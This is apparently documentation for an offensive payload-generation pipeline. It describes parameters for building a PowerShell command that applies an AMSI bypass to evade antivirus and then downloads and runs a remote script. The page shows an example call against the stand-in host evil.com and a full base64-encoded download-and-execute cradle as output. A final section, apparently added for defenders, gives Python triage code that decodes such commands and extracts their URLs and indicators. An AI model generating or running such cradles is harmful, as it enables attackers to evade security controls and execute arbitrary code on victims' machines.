Description
Generates a PowerShell command that will download and execute the PowerShell script hosted at the specified URL after first disabling AV interference with an AMSI bypass.
Overview
This pipeline takes in a URL to a PowerShell script you want to run. It generates a PowerShell command that will trigger the ‘ps_generic_cradle’ pipeline with the provided URL. That pipeline applies an obfuscated AMSI bypass and then downloads and executes the script located at the specified URL.
There are two supported methods:
- Staged: Command -> PowerShell Downloader -> Bypasses -> Your Target Script
- Embedded: Command -> Bypasses -> Your Target Script
Parameters
| Parameter Name | Type | Description |
|---|---|---|
| URL | string | The URL for the PowerShell script to run. This parameter is mandatory. |
| Type | string | Staged will pull the cradle down over the network, while the Embedded type includes the cradle in the command itself. Options: ‘Staged’, ‘Embedded’. Default: ‘Staged’. |
| BypassTechnique | PwshAmsiBypassTechnique | The specific AMSI bypass technique to use. Default: ‘AmsiScanBufferStringReplace’. |
Example
This example shows how to generate a PowerShell command to download and execute a PowerShell script located at https://www.evil.com/payload.ps1.
```powershell
Get-Payload 'ps_generic_cradle_command' -Args @{
    URL = 'https://www.evil.com/payload.ps1'
}
```
Because the bypass technique varies between iterations, the exact output differs each time, but it will look similar to this:

```powershell
powershell.exe -ExecutionPolicy Bypass -Command "iex ([System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('W1N5c3RlbS5OZXQuU2VydmljZVBvaW50TWFuYWdlcl06OlNlcnZlckNlcnRpZmljYXRlVmFsaWRhdGlvbkNhbGxiYWNrID0geyR0cnVlfTsgKE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vMTI3LjAuMC4xL3N0YXRpYy9yZXNvdXJjZXMvcHNfZ2VuZXJpY19jcmFkbGU/VVJMPWh0dHBzJTNhJTJmJTJmd3d3LmV2aWwuY29tJTJmcGF5bG9hZC5wczEmYnVpbGQ9aHR0cCcpIHwgaWV4')))"
```
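For analysts who meet a command like the one above in process-creation telemetry, the following added Python example (not part of this pipeline's code) decodes the `FromBase64String` argument, recovers the staging URL and the percent-encoded target URL carried in its `URL` query parameter, and lists the cradle indicators present. The sample command line is the page's own output, embedded as a constructed log field; the `Unicode.GetString` check is an assumed generalisation for UTF-16 encoded variants.

```python
import base64
import re
from urllib.parse import parse_qs, urlparse

# Constructed sample: the command shown on this page, as it would appear in a
# process-creation log field (for example a Sysmon Event ID 1 CommandLine).
SAMPLE_COMMANDLINE = (
    'powershell.exe -ExecutionPolicy Bypass -Command "iex ([System.Text.Encoding]::UTF8'
    ".GetString([Convert]::FromBase64String('"
    "W1N5c3RlbS5OZXQuU2VydmljZVBvaW50TWFuYWdlcl06OlNlcnZlckNlcnRpZmljYXRlVmFsaWRhdGlvbkNhbGxi"
    "YWNrID0geyR0cnVlfTsgKE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQpLkRvd25sb2FkU3RyaW5nKCdo"
    "dHRwOi8vMTI3LjAuMC4xL3N0YXRpYy9yZXNvdXJjZXMvcHNfZ2VuZXJpY19jcmFkbGU/VVJMPWh0dHBzJTNhJTJm"
    "JTJmd3d3LmV2aWwuY29tJTJmcGF5bG9hZC5wczEmYnVpbGQ9aHR0cCcpIHwgaWV4"
    "')))\""
)

B64_ARG = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)", re.I)
URL_RE = re.compile(r"https?://[^\s'\"()]+", re.I)

# Cradle building blocks worth flagging once the payload is decoded.
INDICATORS = (
    "iex", "invoke-expression", "downloadstring",
    "servercertificatevalidationcallback", "frombase64string",
)

def decode_embedded_base64(cmdline):
    """Return the decoded text of every FromBase64String('...') argument."""
    # UTF8.GetString is what this page's output uses; Unicode.GetString would mean UTF-16LE.
    enc = "utf-16-le" if re.search(r"Unicode\.GetString", cmdline, re.I) else "utf-8"
    return [base64.b64decode(m).decode(enc, errors="replace") for m in B64_ARG.findall(cmdline)]

def extract_urls(text):
    """Collect literal URLs, plus any URL carried percent-encoded in a query parameter."""
    found = []
    for url in URL_RE.findall(text):
        found.append(url)
        for values in parse_qs(urlparse(url).query).values():
            found.extend(v for v in values if URL_RE.fullmatch(v))
    return found

def triage(cmdline):
    """Decode a suspicious PowerShell command line and summarise what a defender needs."""
    decoded = decode_embedded_base64(cmdline)
    visible = cmdline + " " + " ".join(decoded)
    lowered = visible.lower()
    return {
        "decoded": decoded,
        "urls": extract_urls(visible),
        "indicators": [i for i in INDICATORS if i in lowered],
    }
```

The second URL in the result is the script the cradle ultimately fetches, which is what should be blocked and hunted for, while the first is the staging endpoint.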
